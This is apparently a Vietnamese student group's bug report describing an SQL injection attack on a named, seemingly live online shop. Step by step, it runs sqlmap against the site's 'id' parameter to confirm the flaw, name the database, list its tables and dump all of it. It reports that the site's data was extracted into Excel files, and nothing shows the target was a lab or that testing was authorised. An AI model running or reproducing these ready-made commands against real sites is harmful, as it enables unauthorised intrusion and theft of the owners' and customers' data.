[Nhóm#3] Lỗi Bảo mật SQL Injection - Trang https://china-shop1.com/index.php?page=greatwall&id=1

[31191026769]

a. Web Browser: Google Chrome: Phiên bản 95.0.4638.69 (Phiên bản Chính thức) (64 bit) b. Các bước để phát hiện lỗi: i. #1 Tải file cài đặt Python và SQLMap Link cài đặt Python: https://www.python.org/downloads/ mở file vừa download chọn install for all users Link cài đặt SQLMap: https://github.com/sqlmapproject/sqlmap/zipball/master ( giải nén file)

ii.#2 Mở app command prompt

iii, #3 Nhập cd và điều hướng file vừa giải nén vào

iv, #4 Nhập câu lệnh python sqlmap.py -u "https://china-shop1.com/index.php?page=greatwall&id=1" Phát hiện có lỗi SQL Injection

v. #5 Nhập câu lệnh python sqlmap.py -u "https://china-shop1.com/index.php?page=greatwall&id=1" -dbs để tìm tên database của website

Ta phát hiện được tên database là fvdstudio_china

vi. #6 Nhập câu lệnh python sqlmap.py -u"https://china-shop1.com/index.php?page=greatwall&id=1" --tables -D fvdstudio_china để liệt kê các bảng trong database

Phát hiện các bảng dữ liệu có thể khai thác

vii. #7 Tiếp tục khai thác các bảng dữ liệu bằng câu lệnh python sqlmap.py -u"https://china-shop1.com/index.php?page=greatwall&id=1" --dump -D fvdstudio_china

Sau khi khai thác xong các bảng dữ liệu đã được lưu vào file

Thu được các file Excel chứa dữ liệu của Website

c. Kết quả thực tế: Các bảng dữ liệu của Website đã được lấy ra d. Kết quả mong đợi: Lấy được dữ liệu của Website

[31191026769]

1